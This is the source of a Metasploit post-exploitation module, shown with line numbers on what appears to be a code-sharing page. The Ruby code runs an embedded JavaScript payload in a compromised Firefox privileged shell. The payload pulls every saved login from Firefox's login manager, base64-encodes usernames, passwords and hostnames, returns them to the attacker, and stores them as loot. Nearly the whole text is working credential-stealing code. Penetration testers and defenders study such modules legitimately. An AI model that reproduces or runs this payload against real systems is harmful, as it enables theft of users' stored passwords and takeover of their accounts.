Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Payload::Firefox
10
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Firefox Gather Passwords from Privileged Javascript Shell',
17
        'Description' => %q{
18
          This module allows collection of passwords from a Firefox Privileged Javascript Shell.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'joev' ],
22
        'DisclosureDate' => '2014-04-11'
23
      )
24
    )
25

26
    register_options([
27
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
28
    ])
29
  end
30

31
  def run
32
    results = js_exec(js_payload)
33
    if results.present?
34
      begin
35
        passwords = JSON.parse(results)
36
        passwords.each do |entry|
37
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
38
        end
39

40
        if !passwords.empty?
41
          file = store_loot('firefox.passwords.json', 'text/json', rhost, passwords.to_json)
42
          print_good("Saved #{passwords.length} passwords to #{file}")
43
        else
44
          print_warning('No passwords were found in Firefox.')
45
        end
46
      rescue JSON::ParserError => e
47
        print_warning(results)
48
      end
49
    end
50
  end
51

52
  def js_payload
53
    %|
54
      (function(send){
55
        try {
56
          var manager = Components
57
                          .classes["@mozilla.org/login-manager;1"]
58
                          .getService(Components.interfaces.nsILoginManager);
59
          var logins = manager.getAllLogins();
60
          var passwords = [];
61
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
62
          var fields = ['password', 'passwordField', 'username', 'usernameField',
63
                        'httpRealm', 'formSubmitURL', 'hostname'];
64

65
          var sanitize = function(passwdObj) {
66
            var sanitized = { };
67
            for (var i in fields) {
68
              sanitized[fields[i]] = b64(passwdObj[fields[i]]);
69
            }
70
            return sanitized;
71
          }
72

73
          // Find user from returned array of nsILoginInfo objects
74
          for (var i = 0; i < logins.length; i++) {
75
            passwords.push(sanitize(logins[i]));
76
          }
77

78
          send(JSON.stringify(passwords));
79
        } catch (e) {
80
          send(e);
81
        }
82
      })(this.send);
83
    |.strip
84
  end
85
end
86

87